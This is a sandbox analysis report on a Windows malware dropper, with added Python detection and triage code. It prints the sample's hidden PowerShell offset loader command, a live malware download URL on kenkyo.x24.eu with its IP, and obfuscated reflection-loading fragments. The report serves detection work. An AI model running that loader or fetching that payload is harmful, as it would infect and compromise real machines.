
Windows Analysis Report
PO0317011.exe

Overview

General Information

Sample name: PO0317011.exe
Analysis ID: 1638437
MD5: ac30b21ea0e4758774eec541ef3445e3
SHA1: ccde32ff4ff72d31a21635d14521cf38f7b9351f
SHA256: 05f9ab531ad28b30e3b464ab5c1800890c97c746873b13f5c55a2cdfffb58528
Tags: exe, user-threatcat_ch

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • PO0317011.exe (PID: 7736, cmdline: "C:\Users\user\Desktop\PO0317011.exe", MD5: AC30B21EA0E4758774EEC541EF3445E3)
    • powershell.exe (PID: 7764, cmdline: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7772, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7356, cmdline: "C:\Windows\SysWOW64\msiexec.exe", MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
No configs have been found
No yara matches

Sigma Overview

Source: Network Connection | Author: frack113 | Data: DestinationIp: 5.255.110.9, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7356, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49723
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", CommandLine: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO0317011.exe", ParentImage: C:\Users\user\Desktop\PO0317011.exe, ParentProcessId: 7736, ParentProcessName: PO0317011.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", ProcessId: 7764, ProcessName: powershell.exe

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-14T11:59:25.416764+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49723 | 5.255.110.9 | 443 | TCP
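The three rule hits above describe one chain: a hidden PowerShell launched by the NSIS dropper with an offset-based loader command line, PowerShell writing a PE into the same staging directory, and a bare msiexec.exe (no /i, no package) opening an outbound TCP connection. The detection logic below, run over constructed Sysmon-style events, is an added example and is not Joe Sandbox or Sigma code: the event field names follow Sysmon's EventID 1/3/11 layout, the sample events are built from the process tree in this report, and the regexes and rule names are the editor's own assumptions.

```python
"""Detection logic for the process chain in this report, run over constructed
Sysmon-style events. Added example, not Joe Sandbox or Sigma code."""
from __future__ import annotations
import re

# Sysmon EventID 1 = process create, 3 = network connection, 11 = file create.
PROCESS_CREATE, NETWORK_CONNECT, FILE_CREATE = 1, 3, 11

# Offset-based loader: read a whole file with -Raw, cut a short SubString out
# of it, then invoke that substring with the call operator on the rest.
LOADER_RE = re.compile(
    r"(?:gc|get-content|cat|type)\s+-raw\s+'(?P<path>[^']+)'.*?"
    r"\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\).*?\.\$\w+\(",
    re.IGNORECASE | re.DOTALL,
)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
PE_EXT = (".exe", ".dll", ".scr", ".sys", ".cpl")


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def is_msiexec(image: str) -> bool:
    return image.lower().endswith("\\msiexec.exe")


def check_event(ev: dict) -> list[str]:
    """Return the names of every rule the event trips (empty if clean)."""
    hits: list[str] = []
    image = ev.get("Image", "")
    if ev["EventID"] == PROCESS_CREATE and is_powershell(image):
        cmd = ev.get("CommandLine", "")
        if LOADER_RE.search(cmd):
            hits.append("powershell_offset_loader")
        if HIDDEN_RE.search(cmd):
            hits.append("powershell_hidden_window")
    elif ev["EventID"] == FILE_CREATE and is_powershell(image):
        # Mirrors Sigma "Potential Binary Or Script Dropper Via PowerShell".
        if ev.get("TargetFilename", "").lower().endswith(PE_EXT):
            hits.append("powershell_drops_pe")
    elif ev["EventID"] == NETWORK_CONNECT and is_msiexec(image) and ev.get("Initiated"):
        # Mirrors Sigma "Msiexec Initiated Connection".
        hits.append("msiexec_initiated_connection")
    return hits


def loader_details(cmd: str) -> dict | None:
    """Pull the staged file and the SubString offset/length out of the loader."""
    m = LOADER_RE.search(cmd)
    if not m:
        return None
    return {"path": m["path"], "offset": int(m["off"]), "length": int(m["len"])}


# Constructed events modelled on the report's process tree (PIDs, paths and the
# command line are copied from the report; the Sysmon field layout is assumed).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 7764,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\user\Desktop\PO0317011.exe",
     "CommandLine": "powershell.exe -windowstyle hidden \"$Yern=GC -Raw "
                    "'C:\\Users\\user\\AppData\\Local\\resider\\actinidiaceae\\Sendetidernes.fru';"
                    "$Haul=$Yern.SubString(53177,3);.$Haul($Yern)\""},
    {"EventID": 11, "ProcessId": 7764,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe"},
    {"EventID": 3, "ProcessId": 7356, "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "Initiated": True, "DestinationIp": "5.255.110.9", "DestinationPort": 443},
    # Benign control: an admin reading a file with -Raw but without the offset trick.
    {"EventID": 1, "ProcessId": 9001,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Get-Content -Raw 'C:\\logs\\app.log' | Select-String ERROR\""},
]


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> rules hit, dropping processes with no hits."""
    out: dict[int, list[str]] = {}
    for ev in events:
        for h in check_event(ev):
            out.setdefault(ev["ProcessId"], []).append(h)
    return out


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```

The msiexec rule is deliberately narrow: Windows Installer itself can fetch packages from a URL, so in production the condition should also require an empty or package-less command line (as here: "C:\Windows\SysWOW64\msiexec.exe" with no arguments) or a parent that is not the Installer service.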


AV Detection

Source: PO0317011.exe | Avira: detected
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin | Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y | Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS | Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU | Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/ | Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB# | Avira URL Cloud: Label: malware
(The suffixes after .bin in the variants above, I#y, cS, ~RU and B#, are adjacent bytes carved from process memory together with the URL string, not distinct download paths.)
Source: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe | Avira: detection malicious, Label: TR/Injector.pmbgm
Source: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe | ReversingLabs: Detection: 52%
Source: PO0317011.exe | Virustotal: Detection: 63%
Source: PO0317011.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: PO0317011.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: PO0317011.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: W.pdb4 | source: msiexec.exe, 0000000B.00000003.2269063976.0000000007D91000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose | 0_2_00406393
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405841
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_004027FB FindFirstFileW | 0_2_004027FB

Networking

Source: Joe Sandbox View | IP Address: 5.255.110.9
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49723 -> 5.255.110.9:443
Source: global traffic | HTTP traffic detected: GET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: kenkyo.x24.eu | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: kenkyo.x24.eu
Source: msiexec.exe, 0000000B.00000003.2269063976.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268318114.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268428595.0000000007D8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: PO0317011.exe, PO0317011.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007CDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2501990981.0000000022D90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 5.255.110.9:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard | 0_2_004052EE
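The payload fetch above is what the Suricata "Common Downloader Header Pattern" alert keyed on: a Firefox User-Agent attached to a request that carries only User-Agent, Host and Cache-Control, none of the Accept, Accept-Language, Accept-Encoding or Connection headers a real Firefox navigation sends, for a .bin file parked under a WordPress wp-includes directory. The check below is an added example, not Joe Sandbox, Suricata or ETPRO code: RAW_REQUEST is rebuilt from the HTTP line in this report, BENIGN_REQUEST is a constructed control, and BROWSER_HEADERS is the editor's assumed minimum of what a browser sends (Firefox sends more, including Sec-Fetch-* headers).

```python
"""Header-set check for the downloader request recorded in this report.
Added example, not Joe Sandbox, Suricata or ETPRO code."""
from __future__ import annotations
import re

# Rebuilt from the report: request line plus the only three headers present.
RAW_REQUEST = (
    "GET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) "
    "Gecko/20100101 Firefox/134.0\r\n"
    "Host: kenkyo.x24.eu\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign control: same User-Agent, the header set a browser sends.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) "
    "Gecko/20100101 Firefox/134.0\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)

# Assumed minimum: a browser navigation always carries these; a bare
# WinINet/WinHTTP download loop typically sends none of them.
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding", "connection"}
UA_BROWSER_RE = re.compile(r"(?:Firefox|Chrome|Safari)/\d+")
# Payload parked under a CMS directory with a non-web extension.
CMS_PAYLOAD_RE = re.compile(r"^/wp-(?:includes|content|admin)/.+\.(?:bin|dat|txt)$", re.I)


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request into method, path and lower-cased headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def downloader_indicators(raw: str) -> list[str]:
    """Return the indicator names the request trips; empty means it looks like a browser."""
    _method, path, h = parse_request(raw)
    ind: list[str] = []
    missing = sorted(BROWSER_HEADERS - h.keys())
    if UA_BROWSER_RE.search(h.get("user-agent", "")) and missing:
        ind.append("browser_ua_without_browser_headers:" + ",".join(missing))
    if h.get("cache-control", "").lower() == "no-cache":
        ind.append("cache_control_no_cache")  # forced fresh fetch of a static file
    if CMS_PAYLOAD_RE.search(path):
        ind.append("payload_under_cms_path")
    if len(h) <= 3:
        ind.append(f"minimal_header_count:{len(h)}")
    return ind


if __name__ == "__main__":
    print(downloader_indicators(RAW_REQUEST))
    print(downloader_indicators(BENIGN_REQUEST))
```

Note that this request travelled inside TLS 1.2; the sandbox saw the plaintext because it intercepts the session. On a production network the header check only runs where TLS is terminated (a forward proxy or EDR network telemetry); on the wire the pivots are the JA3 hash, the destination IP and the DNS query for kenkyo.x24.eu listed above.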

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe (dropped file)
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004032A0
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00404B2B
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00407040
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00406869
Source: classification engine | Classification label: mal100.evad.winEXE@6/21@1/1
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW | 0_2_004045AF
Source: C:\Users\user\Desktop\PO0317011.exe | Code function: 0_2_00402095 CoCreateInstance | 0_2_00402095
Source: C:\Users\user\Desktop\PO0317011.exe | File created: C:\Users\user\AppData\Local\resider
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Users\user\Desktop\PO0317011.exe | File created: C:\Users\user\AppData\Local\Temp\nsu3054.tmp
Source: PO0317011.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\PO0317011.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PO0317011.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\PO0317011.exe | File read: C:\Users\user\Desktop\PO0317011.exe
Source: unknown | Process created: C:\Users\user\Desktop\PO0317011.exe "C:\Users\user\Desktop\PO0317011.exe"
Source: C:\Users\user\Desktop\PO0317011.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\PO0317011.exe | Section loaded: uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, kdscli.dll, ncrypt.dll, ntasn1.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll, ntmarta.dll, apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, msvbvm60.dll, vb6zz.dll, uxtheme.dll, sxs.dll
(msvbvm60.dll is not a dependency of Windows Installer; its load into msiexec.exe, together with wininet.dll and schannel.dll, is consistent with the injected code being a VB6 binary that does its own HTTPS download.)
Source: C:\Users\user\Desktop\PO0317011.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\PO0317011.exe | File written: C:\Users\user\AppData\Local\resider\actinidiaceae\forurolige.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bedemller $Officerskorpsets $Allergolog), (Gatfinnens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skriftkoderne = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jalousilaagernes)), $Unridiculousness).DefineDynamicModule($Aaretagenes, $false).DefineType($Penneeck, $Airtime164, [System.MulticastD
Source: C:\Users\user\Desktop\PO0317011.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C34A87 push esp; retf | 11_2_02C34AA7
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C34C84 push ecx; iretd | 11_2_02C34C85
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C31DA9 pushad ; iretd | 11_2_02C31DAA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C31F53 push ss; ret | 11_2_02C31F54
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C32057 push edi; retf | 11_2_02C32058
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C3045B pushad ; iretd | 11_2_02C3045C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C3381A push esi; iretd | 11_2_02C3381B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_02C34B3A push edi; iretd | 11_2_02C34B3B
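Two things in this section are worth reproducing during triage. First, the command line never names the cmdlet it runs: Get-Content -Raw returns the whole staged file as one string, SubString(53177,3) cuts a three-character verb out of it, and the call operator (.$Haul) invokes that verb with the rest of the file as its argument, so the real loader is whatever sits at that offset. Second, the AMSI buffers show the script resolving unmanaged calls by reflection (GetDelegateForFunctionPointer, DefineDynamicAssembly, DefineDynamicModule, DefineType) rather than via Add-Type, which leaves no compiled temporary assembly on disk. The helper below is an added example, not Joe Sandbox code: the report does not show the contents of Sendetidernes.fru, so build_staged_file constructs a stand-in, and the verb at the offset (assumed to be iex, the Invoke-Expression alias) and the marker weights are the editor's assumptions.

```python
"""Triage helper for the offset-based PowerShell loader seen in this report.
Added example, not Joe Sandbox code; the staged file is constructed here."""
from __future__ import annotations
import re

# Command line copied from the report's process tree.
CMDLINE = ("powershell.exe -windowstyle hidden \"$Yern=GC -Raw "
           "'C:\\Users\\user\\AppData\\Local\\resider\\actinidiaceae\\Sendetidernes.fru';"
           "$Haul=$Yern.SubString(53177,3);.$Haul($Yern)\"")

SUBSTR_RE = re.compile(r"\.SubString\((\d+)\s*,\s*(\d+)\)", re.IGNORECASE)

# Markers of reflection-based dynamic code loading exposed by the AMSI buffers
# in the report; weighted so a single common call does not alert on its own.
DYNAMIC_MARKERS = {
    "GetDelegateForFunctionPointer": 3,  # turns a raw address into a callable
    "DefineDynamicAssembly": 3,          # builds a delegate type at runtime
    "DefineDynamicModule": 1,
    "DefineType": 1,
    "GetProcAddress": 2,
    "VirtualAlloc": 2,
    "WriteProcessMemory": 3,
}


def build_staged_file(offset: int, verb: str = "iex", pad: str = "#") -> str:
    """Construct a stand-in for the .fru file: filler up to `offset`, the verb,
    then a script body carrying the dynamic-loading markers (assumed layout)."""
    body = ("\n$Gatfinnens = [AppDomain]::CurrentDomain.GetAssemblies()\n"
            "$Skriftkoderne = [System.Reflection.Emit.AssemblyBuilder]"
            "::DefineDynamicAssembly(...)\n"
            "$d = [System.Runtime.InteropServices.Marshal]"
            "::GetDelegateForFunctionPointer(...)\n")
    return pad * offset + verb + body


def resolve_verb(script: str, cmdline: str) -> str:
    """Apply the SubString(offset,len) from the command line to the file text.
    The offset indexes characters of the decoded text, so decode the file the
    way Windows PowerShell would before calling this."""
    m = SUBSTR_RE.search(cmdline)
    if not m:
        raise ValueError("no SubString(offset,len) in command line")
    off, ln = int(m.group(1)), int(m.group(2))
    if off + ln > len(script):
        raise ValueError(f"offset {off}+{ln} past end of file ({len(script)} chars)")
    return script[off:off + ln]


def score_dynamic_loading(script: str) -> tuple[int, list[str]]:
    """Weighted count of reflection/unmanaged-call markers present in the script."""
    found = [k for k in DYNAMIC_MARKERS if k in script]
    return sum(DYNAMIC_MARKERS[k] for k in found), found


def triage(script: str, cmdline: str) -> dict:
    verb = resolve_verb(script, cmdline)
    score, markers = score_dynamic_loading(script)
    return {
        "verb": verb,
        "verb_is_invoke": verb.lower() in ("iex", "invoke-expression"),
        "dynamic_score": score,
        "markers": markers,
    }


if __name__ == "__main__":
    staged = build_staged_file(53177)
    print(triage(staged, CMDLINE))
```

When applying this to the real dropped file, read it with the same encoding Windows PowerShell 5.1 would pick for Get-Content (it honours a BOM, otherwise falls back to the system ANSI code page); a UTF-16 or mis-detected file shifts every character index and the offset lands in filler.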

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
